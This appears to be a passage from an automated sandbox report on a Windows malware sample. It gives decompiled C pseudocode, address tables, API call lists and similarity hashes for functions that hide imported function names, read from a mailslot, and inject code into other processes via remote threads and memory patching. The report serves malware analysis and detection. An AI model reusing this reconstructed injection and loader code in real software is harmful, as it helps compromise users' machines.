				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
